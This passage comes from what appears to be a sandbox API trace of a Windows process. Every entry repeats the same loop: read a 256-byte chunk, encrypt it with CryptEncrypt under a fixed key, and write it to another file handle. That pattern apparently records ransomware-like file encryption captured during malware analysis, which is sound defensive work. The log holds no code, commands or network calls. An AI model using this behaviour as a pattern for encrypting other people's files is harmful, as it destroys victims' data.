lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.255] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.255] GetLastError () returned 0x0 [0167.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.255] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.255] GetLastError () returned 0x0 [0167.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.255] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.255] GetLastError () returned 0x0 [0167.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.255] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.255] GetLastError () returned 0x0 [0167.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.255] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.255] GetLastError () returned 0x0 [0167.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.255] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.255] GetLastError () returned 0x0 [0167.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.256] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.256] GetLastError () returned 0x0 [0167.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.256] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.256] GetLastError () returned 0x0 [0167.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.256] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.256] GetLastError () returned 0x0 [0167.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.256] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.256] GetLastError () returned 0x0 [0167.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.256] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.256] GetLastError () returned 0x0 [0167.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.256] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.256] GetLastError () returned 0x0 [0167.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.257] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.257] GetLastError () returned 0x0 [0167.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.257] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.257] GetLastError () returned 0x0 [0167.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.257] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.257] GetLastError () returned 0x0 [0167.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.257] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.257] GetLastError () returned 0x0 [0167.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.257] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.257] GetLastError () returned 0x0 [0167.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.257] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.257] GetLastError () returned 0x0 [0167.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.257] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.257] GetLastError () returned 0x0 [0167.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.258] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.258] GetLastError () returned 0x0 [0167.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.258] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.258] GetLastError () returned 0x0 [0167.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.258] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.258] GetLastError () returned 0x0 [0167.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.258] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.258] GetLastError () returned 0x0 [0167.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.258] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.258] GetLastError () returned 0x0 [0167.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.258] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.258] GetLastError () returned 0x0 [0167.258] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.258] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.259] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.259] GetLastError () returned 0x0 [0167.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.259] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.259] GetLastError () returned 0x0 [0167.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.259] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.259] GetLastError () returned 0x0 [0167.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.259] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.259] GetLastError () returned 0x0 [0167.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.259] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.259] GetLastError () returned 0x0 [0167.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.259] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.259] GetLastError () returned 0x0 [0167.259] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.259] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.259] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.260] GetLastError () returned 0x0 [0167.260] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 